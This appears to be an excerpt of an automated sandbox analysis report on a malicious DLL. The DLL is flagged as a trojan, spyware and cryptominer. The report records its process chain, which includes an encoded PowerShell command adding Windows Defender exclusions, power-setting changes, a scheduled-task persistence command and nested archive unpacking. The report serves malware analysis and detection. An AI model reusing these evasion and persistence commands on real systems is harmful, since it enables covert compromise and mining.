                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_77093B1A8_2_77093B1A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_7709D3108_2_7709D310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_77096B208_2_77096B20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_7707532E8_2_7707532E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_770872568_2_77087256
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_77065B708_2_77065B70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_77082BA48_2_77082BA4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_77066BB08_2_77066BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_770683C08_2_770683C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_77064BD98_2_77064BD9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_770823E08_2_770823E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_770852108_2_77085210
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_770962308_2_77096230
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_77082A408_2_77082A40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_770912898_2_77091289
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_77087A828_2_77087A82
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_7708A2868_2_7708A286
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_77062A908_2_77062A90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_770922D08_2_770922D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_77095AE08_2_77095AE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_7709BAE08_2_7709BAE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_770749148_2_77074914
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_770831608_2_77083160
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_7709A9708_2_7709A970
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_770919818_2_77091981
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_7708B9A08_2_7708B9A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_770879B58_2_770879B5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_7708B1D78_2_7708B1D7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_7709D0408_2_7709D040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_770898438_2_77089843
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_770648608_2_77064860
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_770920708_2_77092070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_7709A0708_2_7709A070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_770660908_2_77066090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_7707D0908_2_7707D090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_770938A08_2_770938A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_770778C08_2_770778C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_770778EF8_2_770778EF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7706B62010_2_7706B620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7706B11010_2_7706B110
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_770688F010_2_770688F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7707A70010_2_7707A700
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_77080F0510_2_77080F05
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7708571010_2_77085710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7706672010_2_77066720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_77070F3410_2_77070F34
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7708D75010_2_7708D750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_77081F6010_2_77081F60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7708476710_2_77084767
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7707E77810_2_7707E778
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7707479D10_2_7707479D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7709B7A010_2_7709B7A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7709BFA010_2_7709BFA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_770817D510_2_770817D5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7708160010_2_77081600
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7709A61010_2_7709A610
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_77063E7010_2_77063E70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7706DEA610_2_7706DEA6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7709AEA010_2_7709AEA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_770676C010_2_770676C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7706951010_2_77069510
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7707C53010_2_7707C530
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7707155010_2_77071550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7707459010_2_77074590
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_77092DA010_2_77092DA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7709CDA010_2_7709CDA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_770795D010_2_770795D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7707EDF010_2_7707EDF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_770955F010_2_770955F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7709D5F010_2_7709D5F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7707FC1B10_2_7707FC1B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7707044910_2_77070449
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_77086C5A10_2_77086C5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7709A45010_2_7709A450
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7708349010_2_77083490
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_770634B010_2_770634B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7709BCB010_2_7709BCB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_77073CC010_2_77073CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_770934F010_2_770934F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_77093B1A10_2_77093B1A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7709D31010_2_7709D310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_77096B2010_2_77096B20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7707532E10_2_7707532E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7708725610_2_77087256
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_77065B7010_2_77065B70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_77082BA410_2_77082BA4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_77066BB010_2_77066BB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_770683C010_2_770683C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_77064BD910_2_77064BD9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_770823E010_2_770823E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7708521010_2_77085210
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7709623010_2_77096230
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_77082A4010_2_77082A40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_77092A4010_2_77092A40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7708725D10_2_7708725D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7709128910_2_77091289
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_77087A8210_2_77087A82
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7708A28610_2_7708A286
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_77062A9010_2_77062A90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_770922D010_2_770922D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_77095AE010_2_77095AE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_77080AE110_2_77080AE1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7709BAE010_2_7709BAE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7707491410_2_77074914
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7708115010_2_77081150
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7708316010_2_77083160
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7709A97010_2_7709A970
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7709198110_2_77091981
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7706999010_2_77069990
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7708B9A010_2_7708B9A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_770879B510_2_770879B5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7708B1D710_2_7708B1D7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7709D04010_2_7709D040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7708984310_2_77089843
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7706486010_2_77064860
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7709207010_2_77092070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7709A07010_2_7709A070
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7706609010_2_77066090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_7707D09010_2_7707D090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_770938A010_2_770938A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_770778C010_2_770778C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 10_2_770778EF10_2_770778EF
                Source: Joe Sandbox ViewDropped File: C:\ProgramData\Dllhost\WinRing0x64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                Source: C:\Users\user\AppData\Local\Temp\main\7z.exeProcess token adjusted: SecurityJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 02ECD937 appears 32 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 02ECD495 appears 32 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 02EE3D3A appears 40 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 02ECBFBB appears 32 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 77073830 appears 144 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 02ED2EBA appears 36 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 770681C0 appears 94 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: String function: 02ECDDB9 appears 41 times
                Source: winlogson.exe.33.drStatic PE information: Number of sections : 11 > 10
                Source: winlogson.exe.33.drStatic PE information: No import functions for PE file found
                Source: winlogson.exe.33.drStatic PE information: Data appended to the last section found
                Source: n7ZKbApaa3.dllStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
                Source: 0000001F.00000002.1911910899.00000000004CA000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                Source: Process Memory Space: Installer.exe PID: 4952, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                Source: WinRing0x64.sys.33.drBinary string: \Device\WinRing0_1_2_0
                Source: classification engineClassification label: mal100.troj.spyw.evad.mine.winDLL@82/43@14/5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 8_2_77092DA0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,8_2_77092DA0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1472:120:WilError_03
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\ProgramV3
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5916:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6840:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2180:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8052:120:WilError_03
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeFile created: C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                Source: n7ZKbApaa3.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exeFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\n7ZKbApaa3.dll,WindowsHandle
                Source: aspnet_regiis.exe, 00000007.00000003.1527594236.00000000056A7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1618684191.0000000002EEC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1527388023.00000000056C4000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000007.00000003.1618184588.00000000056BB000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1530776649.0000000004D65000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1530530609.0000000004D84000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1589436179.0000000004D6A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000008.00000003.1589554219.0000000002976000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: n7ZKbApaa3.dllReversingLabs: Detection: 71%
                Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\n7ZKbApaa3.dll"
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\n7ZKbApaa3.dll",#1
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\n7ZKbApaa3.dll,WindowsHandle
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\n7ZKbApaa3.dll",#1
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\n7ZKbApaa3.dll",WindowsHandle
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess created: C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exe "C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exe"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess created: C:\Users\user\AppData\Local\Temp\MPDIZKEMMIDUY52JFU3.exe "C:\Users\user\AppData\Local\Temp\MPDIZKEMMIDUY52JFU3.exe"
                Source: C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p29586644319935208542739921766 -oextracted
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_11.zip -oextracted
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_10.zip -oextracted
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_9.zip -oextracted
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_8.zip -oextracted
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "Installer.exe"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\Installer.exe "Installer.exe"
                Source: C:\Users\user\AppData\Local\Temp\main\Installer.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C powershell -EncodedCommand "PAAjAEcASgBpAFIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBOAGIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcAB2AGoAdgBZAFcAbQBPAEwAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMANgBOAFoAMAA4AGoAcABIAHYAbgAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "PAAjAEcASgBpAFIAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBOAGIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcAB2AGoAdgBZAFcAbQBPAEwAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMANgBOAFoAMAA4AGoAcABIAHYAbgAjAD4A"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-ac 0
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -hibernate-timeout-dc 0
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-ac 0
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /x -standby-timeout-dc 0
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\powercfg.exe powercfg /hibernate off
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"
